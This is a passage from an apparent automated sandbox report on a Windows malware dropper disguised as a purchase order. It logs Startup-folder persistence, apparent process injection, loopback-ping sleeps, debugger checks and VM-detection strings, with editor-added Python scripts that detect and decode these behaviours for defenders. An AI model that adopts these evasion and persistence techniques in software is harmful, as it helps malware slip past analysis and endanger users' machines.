                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, API/Special instruction interceptor: Address: 7FFAC542D004
                Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 49 (4 identical entries)
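The `ping 127.0.0.1 -n 49` entries above are the classic living-off-the-land sleep: ping.exe sends one echo request per second regardless of how fast the loopback reply arrives, so a 49-echo ping stalls the calling cmd.exe for roughly 48 seconds without the sample ever calling Sleep() itself. The Python below is an added detection example, not part of the Joe Sandbox report: it parses process-creation command lines, estimates the delay each one implies, and flags the ones long enough to be a deliberate stall. It goes beyond the report by also covering `timeout /t` and `choice /t`, which serve the same purpose. The telemetry records are constructed; only the first is rebuilt from the lines above, and the `ProcessEvent`/`Finding` types and the 5-second threshold are this example's own choices.

```python
"""Flag living-off-the-land sleep primitives in Windows process-creation telemetry.

Added example, not sandbox code. Windows ping sends one echo request per second
whatever the reply latency, so against a loopback address `ping 127.0.0.1 -n N`
blocks its parent for roughly N-1 seconds; malware uses this instead of Sleep()
because the delay happens inside a separate, signed Microsoft binary.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

LOOPBACK_TARGETS = {"127.0.0.1", "localhost", "::1"}

# ping.exe options that consume the following token as their value (lowercased)
_PING_VALUE_OPTIONS = {"-n", "-w", "-l", "-i", "-s", "-j", "-k", "-v", "-r", "-p"}


@dataclass(frozen=True)
class ProcessEvent:          # hypothetical record shape, one per process creation
    parent_image: str
    image: str
    command_line: str


@dataclass(frozen=True)
class Finding:
    event: ProcessEvent
    implied_seconds: float


def split_windows_cmdline(command_line: str) -> list[str]:
    """Tokenise a Windows command line, keeping double-quoted arguments together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command_line)]


def _norm(option: str) -> str:
    """Normalise '/N' or '-N' to lowercase '-n' so both spellings are handled."""
    option = option.lower()
    return "-" + option[1:] if option.startswith("/") else option


def _ping_sleep_seconds(args: list[str]) -> Optional[float]:
    """Delay implied by a ping invocation, or None when it is a real network probe.

    None for non-loopback targets (delay then depends on the network) and for
    unbounded pings (-t). Default echo count is 4, as in ping.exe.
    """
    count, target, infinite = 4, None, False
    i = 0
    while i < len(args):
        opt = _norm(args[i])
        if opt == "-n" and i + 1 < len(args) and args[i + 1].isdigit():
            count = int(args[i + 1])
            i += 2
        elif opt in _PING_VALUE_OPTIONS:
            i += 2                      # option with a value we do not need
        elif opt == "-t":
            infinite = True
            i += 1
        elif opt.startswith(("-", ">", "<", "|", "&")):
            i += 1                      # valueless flag (-4, -a, -f) or shell redirection
        else:
            if target is None:          # first non-option token is the host
                target = args[i].lower()
            i += 1
    if infinite or target not in LOOPBACK_TARGETS:
        return None
    return float(max(count - 1, 0))


def _value_after(args: list[str], option: str) -> Optional[int]:
    """Integer following the given option (e.g. '/t 30'), or None."""
    for i in range(len(args) - 1):
        if _norm(args[i]) == option and args[i + 1].lstrip("-").isdigit():
            return int(args[i + 1])
    return None


def implied_sleep_seconds(command_line: str) -> Optional[float]:
    """Seconds a command line stalls its parent, or None if it is not a sleep idiom."""
    tokens = split_windows_cmdline(command_line)
    if not tokens:
        return None
    exe = tokens[0].rsplit("\\", 1)[-1].lower()
    exe = exe[:-4] if exe.endswith(".exe") else exe
    args = tokens[1:]
    if exe == "ping":
        return _ping_sleep_seconds(args)
    if exe == "timeout":                # timeout /t 30 [/nobreak]  or  timeout 30
        secs = _value_after(args, "-t")
        if secs is None and args and args[0].isdigit():
            secs = int(args[0])
        return float(secs) if secs is not None and secs >= 0 else None   # /t -1 waits forever
    if exe == "choice":                 # choice /t 10 /d y  takes the default after 10 s
        secs = _value_after(args, "-t")
        return float(secs) if secs is not None else None
    return None


def flag_sleep_events(events: list[ProcessEvent], min_seconds: float = 5.0) -> list[Finding]:
    """Return the events whose command line implies a delay of at least min_seconds."""
    findings = []
    for event in events:
        secs = implied_sleep_seconds(event.command_line)
        if secs is not None and secs >= min_seconds:
            findings.append(Finding(event, secs))
    return findings


# Constructed telemetry. The first record is rebuilt from the sandbox report above;
# the others are benign look-alikes and alternative sleep idioms for comparison.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\PING.EXE",
                 "ping 127.0.0.1 -n 49"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\PING.EXE",
                 "ping -n 2 10.0.0.5"),                      # real reachability check
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\PING.EXE",
                 "ping 127.0.0.1"),                          # default 4 echoes, ~3 s
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\timeout.exe",
                 "timeout /t 30 /nobreak"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\PING.EXE",
                 "ping -t 127.0.0.1"),                       # unbounded, not a timed sleep
]

if __name__ == "__main__":
    for f in flag_sleep_events(SAMPLE_EVENTS):
        print(f"{f.implied_seconds:5.0f}s  {f.event.parent_image} -> {f.event.command_line}")
```

Run over the sample records this reports the 48-second loopback ping and the 30-second timeout and stays quiet on the real reachability check, the default four-echo ping and the unbounded `-t` ping. In a SIEM the same logic is best paired with the parent chain (here cmd.exe launched from a user-writable path), since a lone `ping -n 6 127.0.0.1` also appears in legitimate batch scripts.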
                Source: C:\Users\user\Desktop\PO# 81136575.exe, Memory allocated: 30E0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO# 81136575.exe, Memory allocated: 32D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO# 81136575.exe, Memory allocated: 52D0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe, Memory allocated: 2A00000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe, Memory allocated: 2C50000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe, Memory allocated: 2A90000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe, Memory allocated: 7560000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe, Memory allocated: 8560000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe, Memory allocated: 8700000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe, Memory allocated: 9700000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe, Memory allocated: 9A30000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe, Memory allocated: AA30000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe, Memory allocated: BA30000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe, Memory allocated: 1290000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe, Memory allocated: 2CB0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe, Memory allocated: 2BF0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe, Memory allocated: 7690000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe, Memory allocated: 8690000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe, Memory allocated: 8830000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe, Memory allocated: 9830000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe, Memory allocated: 9B60000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe, Memory allocated: AB60000 memory reserve | memory write watch
                Note: the .NET garbage collector reserves its heap segments with MEM_WRITE_WATCH when concurrent (background) GC is enabled, so "memory reserve | memory write watch" allocations appear in practically every managed process; on their own they are weak evidence of sandbox evasion and should be weighed with the ping-based sleep and the Yara hits above rather than counted separately.
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory allocated: BB60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMemory allocated: 1A30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMemory allocated: 33B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMemory allocated: 53B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMemory allocated: 2660000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMemory allocated: 28E0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMemory allocated: 2700000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMemory allocated: CB0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMemory allocated: 2700000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMemory allocated: 2470000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMemory allocated: 3080000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMemory allocated: 3260000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMemory allocated: 30C0000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0155088E rdtsc 18_2_0155088E
                Source: C:\Users\user\Desktop\PO# 81136575.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\PO# 81136575.exeWindow / User API: threadDelayed 783Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeWindow / User API: threadDelayed 4769Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeWindow / User API: threadDelayed 442Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeWindow / User API: threadDelayed 4711Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeWindow / User API: threadDelayed 4755Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeWindow / User API: threadDelayed 494Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeWindow / User API: threadDelayed 4666Jump to behavior
                Source: C:\Windows\SysWOW64\clip.exeWindow / User API: threadDelayed 9715
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI coverage: 0.9 %
                Source: C:\Windows\SysWOW64\clip.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\PO# 81136575.exe TID: 8416Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exe TID: 8416Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 2296Thread sleep count: 47 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 2296Thread sleep time: -47000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 2960Thread sleep count: 47 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 2960Thread sleep time: -47000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 4620Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 4620Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 6784Thread sleep time: -442000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 6784Thread sleep time: -4711000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 4640Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 4640Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 7192Thread sleep count: 4755 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 5284Thread sleep count: 494 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 5284Thread sleep time: -494000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 4640Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 5284Thread sleep count: 4666 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 5284Thread sleep time: -4666000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exe TID: 3604Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\clip.exe TID: 6072Thread sleep count: 121 > 30
                Source: C:\Windows\SysWOW64\clip.exe TID: 6072Thread sleep time: -242000s >= -30000s
                Source: C:\Windows\SysWOW64\clip.exe TID: 6072Thread sleep count: 9715 > 30
                Source: C:\Windows\SysWOW64\clip.exe TID: 6072Thread sleep time: -19430000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\sages.exe TID: 4648Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_02E1C010 FindFirstFileW,FindNextFileW,FindClose,24_2_02E1C010
                Source: C:\Users\user\Desktop\PO# 81136575.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeThread delayed: delay time: 30000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeThread delayed: delay time: 30000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeThread delayed: delay time: 30000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: firefox.exe, 0000001C.00000002.3022448614.000001A62FB78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllee@
                Source: PO# 81136575.exe, sage.exe.4.drBinary or memory string: #Microsoft-Hyper-V
                Source: PO# 81136575.exe, sage.exe.4.drBinary or memory string: OMicrosoft-Hyper-V-Management-PowerShell
                Source: PO# 81136575.exe, 00000000.00000002.1253880543.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, PO# 81136575.exe, 00000000.00000002.1251917102.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, PO# 81136575.exe, 00000000.00000002.1253880543.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, PO# 81136575.exe, 00000000.00000002.1256723069.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp, sage.exe, 0000000E.00000002.5966810448.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, sage.exe, 00000011.00000002.5979216794.0000000002CBB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTray
                Source: PO# 81136575.exe, sage.exe.4.drBinary or memory string: SMB2Protocol+Microsoft-Hyper-V-All
                Source: PO# 81136575.exe, sage.exe.4.drBinary or memory string: 7Microsoft-Hyper-V-Tools-All
                Source: sage.exe, 00000011.00000002.5979216794.0000000002CBB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q#SOFTWARE\VMware, Inc.\VMware VGAuth
                Source: sage.exe, 0000000E.00000002.6014032031.0000000006B06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll""LF
                Source: clip.exe, 00000018.00000002.5955950229.0000000003096000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-%
                Source: PO# 81136575.exe, sage.exe.4.drBinary or memory string: IMicrosoft-Hyper-V-Management-Clients
                Source: PO# 81136575.exe, 00000000.00000002.1256723069.0000000005AC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: 2051979379GSOFTWARE\VMware, Inc.\VMware VGAuth
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information queried: ProcessInformationJump to behavior
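
Added example, not part of the Joe Sandbox report: a Python triage script that reads behaviour lines of the kind listed above (constructed input, copied from this page) and turns the raw sleep figures into something a responder can act on. Three observations drive it. First, the tool suffixes intervals with "s", but the values are milliseconds: `ping 127.0.0.1 -n 49` idles roughly one second per echo and is logged as -47000s. Second, 922337203685477 equals |INT64_MIN| / 10000, the relative 100 ns interval that kernelbase hands to NtDelayExecution for Sleep(INFINITE); because the sandbox sums intervals per thread, -2767011611056431 and -3689348814741908 decode to three and four parked threads rather than to multi-year sleeps. That decoding is the editor's interpretation, not a claim the report makes. Third, the `mov eax, dword ptr fs:[00000030h]` hits in the Anti Debugging block that follows read TEB.ProcessEnvironmentBlock; that pointer feeds PEB.BeingDebugged and NtGlobalFlag checks, but also the PEB.Ldr walk that position-independent code uses to resolve imports by hand, so the script counts those reads per function as a lead rather than a verdict. The patterns accept both the fused and the space-separated line forms; paths, TIDs and function IDs are the report's own.

```python
"""Triage helper for flattened Joe Sandbox behaviour lines (added example).

The SAMPLE lines are copied from the report above and embedded so the script
runs offline; they are constructed input, not live sandbox output.
"""
import re
from collections import Counter, defaultdict

# Sleep intervals are printed with an "s" suffix but match milliseconds
# ('ping 127.0.0.1 -n 49' -> -47000s). 922337203685477 ms is |INT64_MIN| / 10000,
# the relative 100 ns interval kernelbase passes to NtDelayExecution for
# Sleep(INFINITE). Editor's interpretation of the value, not stated in the report.
INFINITE_MS = (1 << 63) // 10_000          # 922337203685477

# "\s*" lets each pattern accept the raw fused form ("...exeThread sleep time")
# as well as the space-separated form used on this page.
SLEEP_RE = re.compile(
    r"^Source: (?P<proc>.+?) TID: (?P<tid>\d+)\s*Thread sleep time: -(?P<ms>\d+)s >= -30000s")
PING_RE = re.compile(
    r"^Source: (?P<proc>.+?)\s*Process created: .*?PING\.EXE ping 127\.0\.0\.1 -n (?P<n>\d+)")
PEB_RE = re.compile(
    r"^Source: (?P<proc>.+?)\s*Code function: (?P<fn>\S+) mov e[a-d]x, dword ptr fs:\[00000030h\]")


def decode_sleep(total_ms):
    """Split a per-thread interval into (INFINITE sleeps, remaining finite ms).

    The sandbox sums intervals per thread, so -2767011611056431 decodes to three
    INFINITE sleeps, -3689348814741908 to four, and -47000 to 47 one-second waits.
    """
    return divmod(total_ms, INFINITE_MS)


def triage(lines):
    """Aggregate evasion and anti-debug evidence per source process."""
    out = defaultdict(lambda: {"infinite_sleeps": 0, "finite_sleep_ms": 0,
                               "ping_counts": [], "peb_reads": Counter()})
    for line in lines:
        line = line.strip()
        if m := SLEEP_RE.match(line):
            inf, fin = decode_sleep(int(m["ms"]))
            out[m["proc"]]["infinite_sleeps"] += inf
            out[m["proc"]]["finite_sleep_ms"] += fin
        elif m := PING_RE.match(line):
            # Loopback ping sleeps without any Sleep() call in the malware's own
            # process; N echoes cost roughly N-1 seconds of wall clock.
            out[m["proc"]]["ping_counts"].append(int(m["n"]))
        elif m := PEB_RE.match(line):
            # fs:[30h] is TEB.ProcessEnvironmentBlock on x86. The read precedes
            # PEB.BeingDebugged / NtGlobalFlag checks, but also PEB.Ldr walks that
            # resolve imports by hand, so counts alone do not prove anti-debugging.
            out[m["proc"]]["peb_reads"][m["fn"]] += 1
    return dict(out)


def estimated_idle_seconds(record):
    """Wall-clock time a sandbox must outlast before the sample acts (finite part only)."""
    ping_s = sum(max(n - 1, 0) for n in record["ping_counts"])
    return record["finite_sleep_ms"] / 1000 + ping_s


SAMPLE = [  # constructed from the evidence lines above
    r"Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 49",
    r"Source: C:\Users\user\Desktop\PO# 81136575.exe TID: 8416 Thread sleep time: -2767011611056431s >= -30000s",
    r"Source: C:\Users\user\Desktop\PO# 81136575.exe TID: 8416 Thread sleep time: -30000s >= -30000s",
    r"Source: C:\Windows\SysWOW64\PING.EXE TID: 2296 Thread sleep time: -47000s >= -30000s",
    r"Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 4620 Thread sleep time: -3689348814741908s >= -30000s",
    r"Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 6784 Thread sleep time: -4711000s >= -30000s",
    r"Source: C:\Windows\SysWOW64\clip.exe TID: 6072 Thread sleep time: -19430000s >= -30000s",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0154415F mov eax, dword ptr fs:[00000030h]",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0150A147 mov eax, dword ptr fs:[00000030h]",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0150A147 mov eax, dword ptr fs:[00000030h]",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0150A147 mov eax, dword ptr fs:[00000030h]",
]

if __name__ == "__main__":
    for proc, rec in triage(SAMPLE).items():
        print(f"{proc}\n  INFINITE sleeps: {rec['infinite_sleeps']}"
              f"  finite idle: {estimated_idle_seconds(rec):.0f}s"
              f"  PEB reads: {sum(rec['peb_reads'].values())} in {len(rec['peb_reads'])} functions")
```

Run against the lines above, the script reports three parked threads plus 30 s of finite delay for the dropper, four parked threads and a 4711 s loop for sage.exe, a 48 s loopback ping sleep spawned from cmd.exe, and four fs:[30h] reads spread over two functions in AddInProcess32.exe. The finite totals are the numbers to compare against a sandbox's run time; the INFINITE ones are threads that never wake and should not inflate that estimate.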

                Anti Debugging

                Source: C:\Users\user\AppData\Local\Temp\sages.exe System information queried: CodeIntegrityInformation
                Source: C:\Users\user\AppData\Local\Temp\sages.exe System information queried: CodeIntegrityInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe System information queried: KernelDebuggerInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\clip.exe Process queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0155088E rdtsc
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe Code function: 14_2_0FCB19C0 LdrLoadDll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0154415F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0150A147 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0150A147 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0150A147 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_01516179 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_01540118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0159A130 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015201C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015201C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015201F1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015201F1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015201F1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0151A1E3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0151A1E3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0151A1E3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0151A1E3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_0151A1E3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 18_2_015D81EE mov eax, dword ptr fs:[00000030h]
